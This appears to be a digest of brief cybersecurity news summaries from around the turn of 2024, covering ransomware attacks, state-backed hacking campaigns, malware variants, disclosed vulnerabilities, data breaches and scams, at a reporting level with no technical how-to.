The US issues new sanctions against Iran after “destabilizing and potentially escalatory” cyber attacks against US critical infrastructure. The remarks were made in a statement that announced sanctions against six Iranians for last year's cyber-attack against Unitronics, an Israeli manufacturer of programmable logic controllers used in the water sector and other critical infrastructure organizations. Several organizations in the water sector were impacted by a group of hacktivists called the CyberAv3ngers.

Dirtymoe (Purplefox) Affected More Than 2000 Computers in Ukraine

The Government Computer Emergency Response Team of Ukraine (CERT-UA) took action under the law to assist a state-owned enterprise facing significant damage from the DIRTYMOE (PURPLEFOX) malicious program, affecting over 2,000 computers in the Ukrainian internet segment. Analysis of malware samples and reference to reports from Avast and Trendmicro aided in understanding the threat's intricacies.

New Windows Event Log zero-Day Flaw Gets Unofficial Patches

Temporary patches have been released to address a new Windows-zero flaw dubbed EventLogCrasher that lets attackers remotely crash the Event Log service on devices within the same Windows domain. According to security researcher Florian, who discovered and reported the flaw, Microsoft tagged the flaw as “not meeting servicing requirements” and said it's a duplicate of a bug that was disclosed in 2022 (no further details were provided).

US Shorts China's Volt Typhoon Crew Targeting America's Criticals

According to Reuters, the US Justice Department and FBI have reportedly taken action against Chinese state-sponsored hackers attempting to infiltrate American critical infrastructure. Over several months, law enforcement conducted operations authorized by a court order, to disable parts of the Chinese hacking campaign. This campaign, known as Volt Typhoon, was revealed in May 2023 after it was found that the hackers accessed US critical infrastructure networks as far back as 2021.

ICS Ransomware Danger Rages Despite Fewer Attacks

In a recent report provided by Dragos, despite the takedown of prominent ransomware groups, the remaining threat actors have evolved their tactics and maintained the exploitation of zero-day vulnerabilities. This has allowed them to inflict more damage on industrial control systems (ICS) with fewer attacks, as highlighted in Dragos' latest industrial ransomware analysis for the last quarter of 2023.

Microsoft Teams Phishing Pushes DarkGate Malware Via Group Chats

AT&T's cybersecurity research team has uncovered a new wave of phishing attacks that abuse Microsoft Teams group chat requests to distribute malicious attachments designed to infect targeted systems with DarkGate malware. In total, attackers have used what seems to be a compromised team user (or domain) to send over 1,000 malicious group chat invites to unsuspecting users.

New ZLoader Malware Variant Surfaces with 64-bit Windows Compatibility

Rsearchers at Zscaler have uncovered a new campaign that is delivering a new variant ZLoader malware to targeted systems. This variant is said to have been in development since September 2023 and contains significant changes to the loader module, which added RC4 encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time.

Energy Giant Schneider Electric Hit by Cactus Ransomware Attack

Energy management and automation giant Schneider Electric recently suffered from a ransomware attack that targeted its Sustainability Business division, which provides services to enterprise organizations, advising on renewable energy solutions and helping them navigate complex climate regulatory requirements for companies worldwide.

Rust Payloads Exploiting Ivanti Zero-Days Linked to Sophisticated Sliver Toolkit

Recent findings suggest that payloads discovered on compromised Ivanti Connect Secure appliances may originate from a single, highly skilled threat actor, according to incident response provider Synacktiv. A malware analysis by Synacktiv reveals that the 12 Rust payloads found in relation to two Ivanti Connect Secure VPN zero-day vulnerabilities share nearly identical code, suggesting a common origin.

Ukraine: Hack Wiped 2 Petabytes of Data from Russian Research Center

Ukraine's Ministry of Defense says that pro-Ukrainian hacktivists have breached the Russian Center for Space Hydrometeorology (Planeta), and have wiped 2 petabytes of data from their systems. Planeta is a state funded research center that uses space satellite data, ground radars, and ground stations to provide accurate predictions about weather, climate, natural disasters, extreme phenomena, and volcanic monitoring.

A Cyber Insurer's Perspective on How to Avoid Ransomware

In 2023, the cybersecurity landscape saw a resurgence of ransomware attacks, with a 27% increase in frequency during the first half of the year compared to the second half of 2022. May witnessed the highest number of ransomware claims in a single month in Coalition history. Ransomware also became the leading contributor to the overall increase in claims frequency, comprising 19% of all reported claims.

Top 3 Data Breaches of 2023, and What Lies Ahead in 2024

In summary the reports says that the surge in cloud migration, coupled with AI and machine learning, accelerated data use and storage in 2023. This led to significant breaches, with notable incidents including the MOVEit ransomware attack impacting 62 million individuals globally, the ICMR breach exposing 81.5 million Indian citizens' data, and 23andMe's unauthorized access compromising 9 million user accounts.

FBI: Tech support scams now use couriers to collect victims' money

cyber criminals to collect money and valuables from victims of tech support and government impersonation scams. Many of the victims are senior citizens who are being targeted by scammers posing as employees of technology companies, financial institutions, or the U.S. government These victims are told by the actors that their financial accounts have been compromised or are under threat. T

Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines

Researchers at Fortinet uncovered a Python Package Index (PyPI) malware author who goes by the ID “WS” uploading malicious packages to PyPI, designed to infect developers with WhiteSnake Stealer. Several packages were identified including nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111, which researchers estimate to have impacted over 2000 victims.

ChatGPT Cybercrime Surge Revealed in 3000 Dark Web Posts

Kaspersky researchers are warning of a notable surge in dark web discussions related to the use of ChatGPT and other Large Language Models (LLMs) to bolster cyber attacks. Nearly 3000 dark web posts were identified, focusing on a spectrum of cyber-threats, from creating malicious chatbot versions to exploring alternative projects like XXXGPT and FraudGPT. While the chatter apparently peaked in March of last year, there have been continued ongoing discussions about exploiting AI technologies for illegal activities.

Browser Phishing Threats Grew 198% Last Year

Based on Menlo Security's browser security report for 2023, browser-based phishing attacks increased a whopping 198% in the second half of 2023. In general phishing attacks seem to have evolved in the last couple of years. According to researchers, they identified 11,000 zero-hour phishing attacks in a span of 30 days.

Thousands of GitLab Instances Unpatched Against Critical Password Reset Bug

Two weeks ago, GitLab released patches to address a critical password reset vulnerability. Tracked as CVE-2023-7028, the bug can be exploited by actors to send password reset messages to unverified email addresses under their control. If the target organization does not have two-factor authentication, an actor in this case could initiate a potential account takeover by resetting the password. Patches for the bug

Malicious Traffic Distribution System Spotted by Researchers

Researchers have uncovered the growing professionalization to the cybercrime ecosystem, highlighting an online redirection of service, VexTrio, as a major traffic broker for various threat groups. VexTrio operates malicious traffic distribution systems, accessing victims based on factors like device type and location, redirecting them to malicious sites based on client requirements.

The Number of Patient Records Exposed in Data Breaches Doubled in 2023

According to a new report from cybersecurity firm Fortified Health Security, 116 million records were compromised across 655 breaches. In 2023, the number of patient records exposed in data breaches doubled in comparison to 2022, despite the number of breaches declining slightly. This is likely due to an increase in the number of large data breaches, where 16 breaches exposed more than two million patient records each.

Kasseika Ransomware Uses Antivirus Driver to Kill Other Antiviruses

A new ransomware strain, dubbed Kasseika, that was uncovered in December 2023 has joined the list of ransomware gangs to employ Bring Your Own Vulnerable Driver (BYOVD) tactics to disable antivirus software on targeted systems. BYOVD attacks work by either implanting or abusing a vulnerable driver in victim environments to carry out malicious operandi.

Google Pixel Phones Unusable After January 2024 System Update

According to recent reports Google Pixel smartphone owners are experiencing issues after installing the January 2024 Google Play system update. Problems include being unable to access internal storage, open the camera, take screenshots, or open apps. The issue affects various Pixel models, indicating it's not specific to a particular hardware architecture.

Exploit Code Released For Critical Fortra GoAnywhere Bug

Exploit code has been released for a critical vulnerability in Fotra GoAnywhere MFT, a managed file transfer solution. Researchers from Horizon3 released exploit details for CVE-2024-0204, a critical authentication bypass vulnerability which was patched by Fortra on December 4, 2023, but only publicly revealed by the vendor on Monday.

Mandiant Publishes Guide: Defend Against the Latest Active Directory Certificate Services Threats

Active Directory Certificate Services (AD CS) is a server role that enables organizations to leverage public key infrastructure (PKI) as part of their on-premises services to issue and use digital certificates for authenticating identities and endpoints in Active Directory environments. As highlighted by SpecterOps in 2021, AD CS has become a prime target and leverage point in the overall attack chain to achieve post-compromise objectives.

Black Basta Ransomware Group Claims Hack of UK Water Utility Southern Water

The Black Basta ransomware group has added the UK's Southern Water as a victim on their Tor based data leak site, and have threated to publish stolen data if ransom demands are not met by February 29, 2024. “Southern Water is a private utility company responsible for collecting and treating wastewater in Hampshire, the Isle of Wight, West Sussex, East Sussex and Kent, and for providing public water supply to approximately half of this area” (Security Affairs, 2024). The company provides water to a large portion of the UK, and employs over 6,000 people.

Attackers Can Steal NTLM Password Hashes via Calendar Invites

A patched vulnerability (CVE-2023-35636) in Microsoft Outlook, allowing theft of NTLM v2 hashes, can be exploited through specially crafted email headers. Security researcher Dolev Taler and Varonis Threat Labs disclosed two additional unpatched vulnerabilities of “moderate” severity for obtaining NTLM v2 hashes.

loanDepot Says Ransomware Gang Stole Data of 16.6 Million People

Mortgage lender loanDepot has confirmed that approximately 16.6 million individuals had their personal information stolen in a ransomware attack disclosed earlier this month. The attack, which occurred on January 6, led to the shutdown of some systems, affecting recurring automatic payments and causing delays in payment history updates. The company, acknowledging the breach as a ransomware incident, mentioned that files on compromised devices were encrypted by malicious actors.

Senior Microsoft Employee's Email Account Breached in Cyber Attack

Microsoft revealed this week that they were potentially targeted by the Russian state-sponsored hacking group Midnight Blizzard. The group targeted a senior employee at the company by utilizing a password spray attack to infiltrate a legacy non-production test tenant account. This allowed them to gain access to the email accounts of Microsoft's leadership team and employees in cybersecurity and legal departments.

Thieves Steal 35.5M Customers' Data from Vans Sneakers Maker

VF Corporation, the parent company of brands like Vans and North Face, disclosed that 35.5 million customers were impacted when criminals breached their systems in December. The announcement, made in an SEC filing, didn't specify the type of information accessed. However, VF Corp assured that social security numbers, bank details, and payment card information were not compromised, as they are not stored in its IT systems. The company also stated that there is no evidence of consumer passwords being accessed, though the investigation is ongoing.

Over 178K SonicWall Firewalls Vulnerable to DoS, Potential RCE Attacks

Security researchers at Bishop Fox have identified over 178,000 SonicWall next-generation firewalls with the management interface exposed online are vulnerable to two stack-based buffer overflow flaws. Tracked as CVE-2022-22274 and CVE-2023-0656, these two vulnerabilities are essentially the same and can be exploited by unauthenticated actors to perform denial of service and even remote code execution.

Hacker Spins Up 1 Million Virtual Servers to Illegally Mine Crypto

Last week, Europol announced the arrest of a 29-year-old Ukrainian national for using hacked accounts to create 1 million servers used in a worldwide crypto jacking scheme to illegally mine cryptocurrency. This individual is suspected to have been active since 2021 and is known for hijacking cloud computing resources for crypto-mining. Starting in 2021, the hacker infected one of the world's largest e-commerce companies and used automated tools to brute force the passwords of 1,500 accounts of a subsidiary of the e-commerce company.

Protecting MSPs and Mid-Market Companies from ‘FalseFont' Backdoor Attacks

A new backdoor named "FalseFont" has been discovered, attributed to the Iranian hacking group Peach Sandstorm. This backdoor poses a significant threat to Managed Service Providers (MSPs) and mid-market companies, particularly those with limited cybersecurity measures. Peach Sandstorm is a global threat actor known for sophisticated cyberattacks since 2013, targeting sectors like defense, aerospace, and energy.

Finland Warns of Akira Ransomware Wiping NAS and Tape Backup Devices

The Finish National Cybersecurity Center recently sent out an advisory warning of an uptick in Akira Ransomware activity. In the latest set of attacks, Akira actors are going after network-attached storage devices as well as tape devices and wiping backups saved, making it difficult for victims to recover files. As a result, the agency recommends organizations switch to offline backups instead and distribute backups across various locations to prevent unauthorized access.

Atomic Stealer Gets an Upgrade - Targeting Mac Users with Encrypted Payload

Researchers at Malwarebytes have uncovered an updated version of Atomic Stealer, an information stealer designed to target macOS systems. The update was made in mid December, 2023, where authors behind the malware introduced a new payload encryption routine designed to hide certain strings that were previously used for detection and identifying the C2 server.

Cisco Says Critical Unity Connection Bug Lets Attackers Get Root

Cisco patched a critical vulnerability tracked as CVE-2024-20272 in their Unity Connection product. The flaw could allow an unauthenticated attacker to remotely gain root privileges on unpatched devices. Unity Connection is a fully virtualized messaging and voicemail solution for email inboxes, web browsers, Cisco Jabber, Cisco Unified IP Phone, smartphones, or tablets with high availability and redundancy support.

Alert: Water Curupira Hackers Actively Distributing PikaBot Loader Malware

Water Curupira, a threat actor, distributed the Pikabot loader malware in spam campaigns throughout 2023. Trend Micro reported that PikaBot's phishing attacks used a loader and a core module to gain remote access and execute commands via a connection to their server. This activity occurred from Q1 to June, earlier campaigns by cybercrime group TA571 and TA577 targeting victims with Qakbot.

'Swatting' Becomes Latest Extortion Tactic in Ransomware Attacks

Cybercriminals are now using “swatting” to pressure hospitals into paying ransom demands by targeting their patients. Swatting involves making false police reports and prompting armed responses to victims' homes. These criminals aim to coerce hospitals into paying by threatening patients, like in the Fred Hutchinson Cancer Center case, cybercriminals stole medical records and threatened to use swatting tactics on patients if their ransom demands weren't met.

Crooks Pose as Researchers to Retarget Ransomware Victims

Victims of Royal and Akira ransomware are being targeted by actors masquerading as cybersecurity researchers offering to delete the files stolen by the two ransomware gangs. According to Artic Wolf Labs, who have tracked several interactions, these actors contact victims stating they will hack into the server infrastructure of the original ransomware groups involved to delete the exfiltrated data.

NoaBot: Latest Mirai-Based Botnet Targeting SSH Servers for Crypto Mining

Security researchers at Akamai have uncovered a new crypto-mining campaign that has been active since the beginning of 2023. These attacks include the use of a new Mirai-based botnet dubbed ‘NoaBot' which comes with various capabilities including a wormable self-spreader and an SSH key backdoor designed to download and execute additional binaries and spread itself to other systems.

Malware Takedowns Show Progress, But Fight Against Cybercrime Not Over

In its 2023 Adversary Infrastructure Report, published on January 9, 2024, Recorded Future analyzed the effect of three malware takedown operations that took place in 2023 or before: The March 2023 attempt to take down unlicensed versions of commercial red-teaming product Cobalt Strike, a joint project between Microsoft, the Health Information Sharing and Analysis Center (Health-ISAC), and Fortra, the software company that owns Cobalt Strike In the cases of Cobalt Strike and QakBot, law enforcement operations had a significant impact in the short term and malicious activity linked with the two tools dropped drastically in the month following the operation.

Ukrainian “Blackjack” Hackers Take Out Russian ISP

A group linked to Ukraine's SBU has allegedly launched a destructive cyber-attack against a Moscow ISP in retaliation to Russia's takedown of Kyivstar last month. According to reports, the group called “Blackjack” deleted 20 TBs of data at M9 Telecom, leaving some residents of Moscow without Internet service.

.NET Hooking – Harmonizing Managed Territory

For malware researchers, analysts, or reverse engineers, Checkpoint says the ability to alter the functionality of certain parts of code is a crucial step. Manipulating processes for code execution works well for non-managed native code, but becomes more challenging when dealing with managed code. By altering the functionality of managed code, specifically for applications that run on top of .NET, Checkpoint says the open-source library Harmony is the best option.

NoName on Rampage! Claims DDoS Attacks on Ukrainian Government Sites

The NoName ransomware group recently posted a list of their latest DDoS attack victims on their data leak site. Many of these victims include Ukrainian entities such as Accordbank, Zaporizhzhya Titanium-Magnesium Plant, State Tax Service, Central Interregional Tax Administration, Western Interregional Tax Administration, and the Main Directorate of the State Tax Service in Kyiv.

Stealthy AsyncRAT Malware Attacks Targets US Infrastructure For 11 Months

Security researchers have uncovered a new campaign that has been delivering AsyncRAT malware to select targets for the last 11 months using hundreds of unique loader samples and more than 100 domains. The campaign was initially discovered by a security researcher from Microsoft, Igal Lytzki, who spotted attacks last summer that were delivered over hijacked email threads.

Zeppelin ransomware source code sold for $500 on hacking forum

A threat actor who goes by the name ‘RET' is claiming to have access to the source code as well as a builder for the Zeppelin ransomware. Both are being advertised for sale on an underground forum for 500$, with screenshots to prove the legitimacy of the package. In the post, the actor claims to have simply cracked a builder version for the ransomware strain and had acquired the package without a license.

Russian Hackers Penetrated Ukraine Telecoms Giant for Months

Russian hackers were inside Ukrainian telecoms giant Kyivstar's system from at least May last year in a cyberattack that should serve as a "big warning" to the West, Ukraine's cyber spy chief told Reuters. The attack, one of the most dramatic since Russia's full-scale invasion nearly two years ago, knocked out services provided by Ukraine's biggest telecoms operator for some 24 million users for days from Dec. 12.

Ivanti Warns Critical EPM Bug Lets Hackers Hijack Enrolled Devices

Ivanti recently fixed a critical remote code execution (RCE) vulnerability in its Endpoint Management software (EPM). The flaw allows an unauthenticated attackers to hijack enrolled devices or the core server. The service helps manage client devices running a wide range of platforms from Windows and macOS to Chrome OS and other IoT operating systems.

Hacker Hijacks Orange Spain RIPE Account to Cause BGP Havoc

Orange Spain suffered an internet outage today after a hacker breached the company's RIPE account to misconfigure BGP routing and an RPKI configuration. The routing of traffic on the internet is handled by Border Gateway Protocol (BGP), which allows organizations to associate their IP addresses with autonomous system (AS) numbers and advertise them to other routers they are connected to, known as their peers.

Palestinian Hackers Hit 100 Israeli Organizations in Destructive Attacks

Cyber Toufan, a sophisticated threat actor claiming to be formed of Palestinian state cyber warriors, has managed to target over 100 entities in Israel in the last couple of months. These series of attacks have been fueled by geopolitical tensions between Israel and Hamas, a pro-Palestinian militant group. The latest intrusions carried out by Cyber Toufan have led to the exfiltration of large amounts of data which is being released to the public web.

CISA Warns of Actively Exploited Bugs in Chrome and Excel Parsing Library

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities catalog. The first is CVE-2023-7101, affecting the open-source Perl library Spreadsheet::ParseExcel, with a remote code execution flaw. This vulnerability was exploited by Chinese hackers in late December, targeting Barracuda ESG appliances. Mitigations were applied, and an update was released on December 29, 2023.

Nearly 11 Million SSH Servers Vulnerable to New Terrapin Attacks

Shadowservers has released new vulnerability metrics surrounding the recently discovered Terrapin vulnerabilities that threaten the integrity of some SSH connections. The Terrapin flaws target the SSH protocol, affecting both clients and servers, and was developed by academic researchers from Ruhr University Bochum in Germany.

Experts Warn of JinxLoader: Loader Used to Spread FormBook and XLoader

Researchers from Palo Alto Networks and Symantec warned of a new Go-based malware loader called JinxLoader, which is being used to deliver next-stage payloads such as Formbook and XLoader. The name of the threat comes from a League of Legends character. Palo Alto Networks’s Unit 42 first observed the malware in November 2023 reporting that it has been advertised on the hacking forum Hackforums since April 30, 2023.

Microsoft: Hackers Target Defense Firms With New FalseFont Malware

Yesterday, Microsoft posted a series of tweets on X (formerly known as Twitter) stating that it observed Iranian cyber-espionage group APT33 deploy a new backdoor dubbed FalseFont in attacks targeting organizations in the Defense Industrial Base (DIB) sector. According to the tech giant, FalseFont was first observed in attacks as early as November 2023.

Malware Leveraging Public Infrastructure Like GitHub on the Rise

Researchers from ReversingLabs have observed an increase in threat actors using GitHub open source development platform to host malware. The use of public services as command-and-control (C2) infrastructure isn’t a revolutionary technique for malicious actors, but the researchers highlight two novel techniques deployed on GitHub.

Justice Secretary in Deepfake General Election Warning

UK Secretary of State for Justice, Robert Buckland, has voiced concerns about the threat of deepfakes to British democracy prior to upcoming elections. He cited that there is a “clear and present danger” regarding deepfakes and noted how they can be used to potentially erode trust in information and sway opinions. Buckland highlighted that with AI being easily accessible and the sheer scale of generative AI, individuals can create and share content rapidly

Fake Delivery Websites Surge By 34% in December

With many shoppers rushing to order Christmas gifts, scammers are taking advantage of this opportunity by creating phishing sites impersonating delivery services. According to Group-IB, these fake delivery sites have surged by 34% in December alone, with the company identifying 587 sites designed to look like legitimate postal operators and delivery companies in the first 10 days of December.

Fake F5 BIG-IP Zero-Day Warning Emails Push Data Wipers

Israel’s National Cyber Directorate (INCD) recently disclosed a new phishing campaign that is distributing Windows and Linux data wipers via emails pretending to be a warning about a zero-day vulnerability in F5 BIG-IP devices. According to INCD, the emails push out an executable named F5UPDATER[.]exe for Windows users, while a shell script named update[.]sh is used for Linux users.

Justice Department Disrupts Prolific ALPHV/Blackcat Ransomware Variant Summary:

Yesterday, the U.S Justice Department announced the disruption of the BlackCat ransomware group, which to date has managed to target the computer networks of more than 1,000 victims, including those that support U.S. critical infrastructure (government facilities, emergency services, defense industrial base companies, critical manufacturing, and healthcare and public health facilities).

New Go-Based JaskaGO Malware Targeting Windows and macOS Systems

AT&T Alien Labs has uncovered a new Go-based information stealer malware dubbed JaskaGo designed to target both Windows and Apple macOS systems. According to researchers, the info-stealer comes equipped with an extensive array of commands from its C2 server that enable actors to execute shellcode, enumerate running processes, harvest information from the victim system, and download additional payloads.

New Go-Based JaskaGO Malware Targeting Windows and macOS Systems

AT&T Alien Labs has uncovered a new Go-based information stealer malware dubbed JaskaGo designed to target both Windows and Apple macOS systems. According to researchers, the info-stealer comes equipped with an extensive array of commands from its C2 server that enable actors to execute shellcode, enumerate running processes, harvest information from the victim system, and download additional payloads.

Novel Terrapin Attack Uses Prefix Truncation to Downgrade the Security of SSH Channels

Secure Shell Protocol (SSH) was developed in early 1995, after a password sniffer was used to discover passwords store in plain text on Finland’s Helsinki University of Technology. SSH was one of the first network tools to route traffic through an impregnable tunnel fortified with a still-esoteric feature known as "public key encryption, SSH quickly caught on around the world.

What To Do When Receiving Unprompted MFA OTP Codes

This article highlights common methods cybercriminals use to bypass multi-factor authentication, specifically receiving unprompted one-time passcodes (OTP). Receiving an OTP sent as an email or text should be a cause for concern as it likely means your credentials have been stolen.

New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities

Researchers at SentinelOne have uncovered an updated version of a backdoor dubbed Pierogi which is being used by the Gaza Cyber Gang, a pro-Hamas threat actor, to target Palestinian entities. The new variant, referred to as Pierogi++, is written in the C++ programming language. Similar to its predecessor, Pierogi++ is designed to take screenshots, execute commands, and download other payloads.

Threat of Violence Likely Heightened Throughout Winter

The FBI issued an advisory that they are closely monitoring threats to public safety during the holiday season, which may be amplified by the ongoing Israel-Hamas conflict. The FBI, Department of Homeland Security (DHS), and National Counterterrorism Center (NCTC) are issuing this Public Service Announcement to highlight elements posing potential threats in the United States from a variety of actors during the winter season.

BianLian, White Rabbit, and Mario Ransomware Gangs Spotted in a Joint Campaign

Based on a recent Digital Forensics & Incident Response (DFIR) engagement with a law enforcement agency (LEA) and one of the leading investment organizations in Singapore (and other victims), Resecurity (USA) has uncovered a meaningful link between three major ransomware groups. Resecurity’s HUNTER (HUMINT) unit spotted the BianLian, White Rabbit, and Mario ransomware gangs collaborating in a joint extortion campaign targeting publicly-traded financial services firms.

Chinese APT Volt Typhoon Linked to Unkillable SOHO Router Botnet

The US cybersecurity landscape faces a critical challenge with the emergence of a highly resilient botnet operated by the Chinese-backed Volt Typhoon group. This botnet has ingeniously repurposed end of life Small Office/Home Office (SOHO) routers from Cisco, Netgear, and Fortinet, and set up a Tor-like covert data transfer network to perform malicious operations. Notably, these routers, lacking security updates, now serve as a central element in Volt Typhoon’s penetration strategy across critical sectors like communications, manufacturing and government.

Microsoft Seized the US Infrastructure of the Storm-1152 Cybercrime Group

Microsoft recently announced that it seized multiple domains used by the cybercrime group Storm-1152 to sell fraudulent Outlook accounts. According to the vendor, Storm-1152 has registered over 750 million fraudulent Microsoft accounts, enabling the group to generate millions of dollars in sales. After obtaining a court order from the Southern District of New York on December 7, 2023.

BazarCall Attacks Abuse Google Forms to Legitimize Phishing Emails

Email security firm Abnormal uncovered a new wave of BazarCall attacks abusing Google Forms to target users. First documented in 2021, BazarCall is a type of phishing attack that utilizes fake payment/subscription invoices in emails impersonating known brands. In this case, victims are notified that their account has been charged and should contact customer support if they don’t recognize the transaction. Rather than including a link in the email, the actors will leave behind a phone number that the victim can call.

Cozy Bear Hackers Target JetBrains TeamCity Servers in Global Campaign

In a joint advisory published on December 13, 2023, six security and intelligence agencies in the US, the UK and Poland warned that Cozy Bear has been exploiting an authentication bypass vulnerability in TeamCity (CVE-2023-42793) since at least September 2023. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes. The access could also be used to conduct software supply chain attacks.

Vulnerabilities Now Top Initial Access Route For Ransomware

Cybersecurity insurance provider Corvus reports that ransomware actors are switching tactics and are choosing to exploit vulnerabilities rather than leverage phishing emails to breach victim organizations. Analyzing metrics from claims data this year, Corvus was able to examine threat actor activity. The company claims that vulnerability exploitation rose as an initial access method from nearly 0% of ransomware claims in H2 2022 to almost a third in the first half of 2023.

Russia Set to Ramp Up Attacks on Ukraine’s Allies This Winter

A new report by Cyjax warns of an increase in cyberattacks from Russia targeting Ukraine and its allies as the Winter season approaches. According to researchers, Russia’s missile production is struggling to keep pace with its tactical, operational, and strategic usage, due to economic sanctions and a shortage of workers.

What To Do If Your Company Was Mentioned on Darknet?

This article examines different scenarios where your company may be mentioned on the darkweb, and what you can do to navigate and mitigate the potential risks associated. Specifically, the article focuses on the sale of compromised accounts, internal databases and documents, as well as access to corporate infrastructure, and the sale of personal identifiable information like ID photos, drivers licenses, etc.

Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign

A new blog post from IBM’s X-Force highlights APT28’s, a group of Russian military hackers, use of Israel-Hamas conflict lures to deliver Headlace malware. For its part, Headlace is a multi-component malware that includes a dropper, a VBS launcher, and a backdoor using MSEdge in headless mode, designed to download second-stage payloads and exfiltrate credentials as well as other sensitive details.

Ukraine's Largest Phone Operator Hack Tied to War With Russia

Ukraine’s largest mobile network operator Kyivstar was impacted by a cyber event that lead to significant shutdowns. The company, which is owned by Amsterdam-based Veon, announced on December 12th, that a powerful cyber attack caused technical failure, which impacted Internet access and mobile communications for customers.

Privilege Elevation Exploits Used in Over 50% Of Insider Attacks

A report published by Crowdstrike researchers indicates that insider threats are escalating, with Crowdstrike’s report indicating a surge in unauthorized actions using privilege escalation flaws. Approximately 55% of these threats leverage privilege scalation exploits, while 45% stem from downloading risky tools or misusing them.

AutoSpill Attack Steals Credentials from Android Password Managers

Security researchers developed a new attack, which they named AutoSpill, to steal account credentials on Android during the autofill operation. In a presentation at the Black Hat Europe security conference, researchers from the International Institute of Information Technology (IIIT) at Hyderabad said that their tests showed that most password managers for Android are vulnerable to AutoSpill, even if there is no JavaScript injection.

Toyota Warns Customers of Data Breach Exposing Personal, Financial Info

Toyota Financial Services recently warned its customers about a data breach, where actors were able to gain unauthorized access to some of its systems in Europe and Africa, allowing the actors to steal sensitive personal and financial data. Medusa ransomware has claimed responsibility for the attack, demanding a 8 million ransomware be paid in exchange for the data stolen.

ALPHV/BlackCat Site Downed After Suspected Police Action

Last Friday, cyber security firm RedSense disclosed on X (formerly known as Twitter) that BlackCat Ransomware’s Tor data leak site had been taken down after police action. As of writing no official disclosure from law enforcement authorities has been published to the public regarding such a takedown.

Iran Threatens Israel's Critical Infrastructure With 'Polonium' Proxy

An Iranian proxy hacking group named Polonium, operating from Lebanon poses a serious threat to Israel’s critical infrastructure. Despite being less known than other hacking groups, Polonium has intensified its attacks, targeting multiple Israeli sectors and evolving its tactics over time. Microsoft reported that Polonium spied on over 20 Israeli organizations, including key sectors like Transportation, IT, Finance, and Healthcare in Spring 2022.

Russian Military Hackers Target NATO Fast Reaction Corps

APT28, a group of Russian military hackers have been exploiting a Microsoft Outlook zero-day (CVE-2023-23397) since March 2022 to target multiple European NATO member countries, including a NATO Rapid Deployable Corps. Over the course of 20 months, researchers at Palo Alto Networks’ Unit 42 have observed this group launch three different campaigns targeting at least 30 organizations across 14 nations deemed of probable strategic intelligence significance to Russia's military and government.

Ransomware Surge is Driving UK Inflation, Says Veeam

New data gathered by Veeam indicates that a surge in ransomware attacks has caused businesses in the UK to increase prices, adding to the already high inflation. Veeam surveyed 100 UK businesses with over 500 employees that had been compromised by ransomware. According to the software company, large companies had to increase costs to customers by an average of 17% following an attack.

Forward Momentum: Key Learnings From Trend Micro’s Security Predictions for 2024

Advances in cloud technology, artificial intelligence and machine learning, and Web3 are reshaping the threat landscape, urging organizations to re-strategize their defenses and stay up to date with the latest trends and threats. A new blog post by Trend Micro highlights the new challenges that will come with these emerging technologies and what to expect for the upcoming new year.

Ninety Percent of Energy Companies Suffer Supplier Data Breach

Security Scorecard recently analyzed the cybersecurity posture of the largest coal, oil, natural gas, and electric companies in the US, UK, France, Germany, and Italy, as well as their suppliers. According to the vendor, UK energy firms received the high average security rating (80% holding a B or above). However, a third of global firms received a rating of C or lower, making them susceptible to a breach.

Why Cloud Security Matters in Today’s Business World

As companies increasingly adopt cloud computing, a report by Ermetic and IDC reveals that 80% of CISOs experienced cloud data breaches in the last 18 months, with 43% facing 10 or more breaches. The report emphasizes the need for a robust understanding of cloud security to safeguard organizations, personnel, and customers during the transition. Cloud security involves principles like access controls and system audits. Key reasons to embrace it include scalability, reliability, and protection against DDoS attacks.

New Krasue Linux RAT Targets Telecom Companies in Thailand

Group-IB researchers discovered a previously undetected Linux remote access trojan called Krasue being employed in attacks aimed at telecom companies in Thailand. The Krasue Remote Access Trojan (RAT) emerged in 2021 according to samples found on VirusTotal. The name “Krasue,” comes from the Thai name of a nocturnal native spirit known throughout Southeast Asian folklore.

LockBit Remains Top Global Ransomware Threat

A new report from ZeroFox highlights LockBit’s continued dominance in the ransomware landscape, with the group accounting for 25% of all ransomware and digital extortion attacks worldwide between January 2022 and September 2023. In particular, LockBit poses a big threat to entities in North America, with an average of 40% of LockBit victims based in this region, spanning the manufacturing, construction, retail, legal & consulting, and healthcare sectors. Researchers note this is expected to increase to 50% by the end of 2023.

Hackers Breach US Govt Agencies Using Adobe ColdFusion Exploit

CISA recently published an advisory warning that hackers are exploiting a critical vulnerability in Adobe ColdFusion to gain initial access to government servers. Tracked as CVE-2023-26360, the flaw relates to an improper access control vulnerability in Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier), which could result in arbitrary code execution.

Governments Spying on Apple, Google Users Through Push Notifications - US Senator

Senator Ron Wyden has raised concerns that unidentified governments are surveilling smartphone users through push notifications on apps, demanding data from Google and Apple. Push notifications, used by various apps for updates, messages, and news alerts, often travel through Google and Apple servers. This unique access gives the companies insight into app traffic and user activity, potentially facilitating government surveillance.

Russian APT28 Exploits Outlook Bug to Access Exchange

Microsoft issued a warning regarding the exploitation of CVE-2023-23397 by APT 28, a Russian state sponsored group. The targeted entities include government, energy, transportation, and other key organizations in the United States, Europe, and the Middle East. CVE-2023-23397 was first disclosed and patched as a zero-day bug in Microsoft’s March 2023 Patch Tuesday update round.

New AeroBlade Hackers Target Aerospace Sector in the U.S.

Cyber security firm Blackberry has uncovered a campaign targeting an aerospace organization in the United States. Researchers are tracking the actors behind this campaign as ‘AeroBlade.” Based on the observed attack, the actors used spear-phishing as their delivery mechanism, where they employed a weaponized document, sent as an email attachment.

Holiday Shopping Scams Persist with Cybercriminal Tactics

Cybercriminals are currently targeting SaaS services and utilizing AI technology, social media phishing, and brand impersonation to pilfer from various sectors, impacting the reputations of legitimate businesses. It is crucial to adopt proactive measures, such as manual or automated takedown services, to maintain consumer trust during the bustling holiday shopping season. The USPS phishing attack encompasses over 3,000 phishing domains that mimic reputable brands like Walmart, with scammers exploiting stolen data to entice victims into revealing sensitive banking details.

Florida Water Agency Latest to Confirm Cyber Incident as Feds Warn of Nation-state Attacks

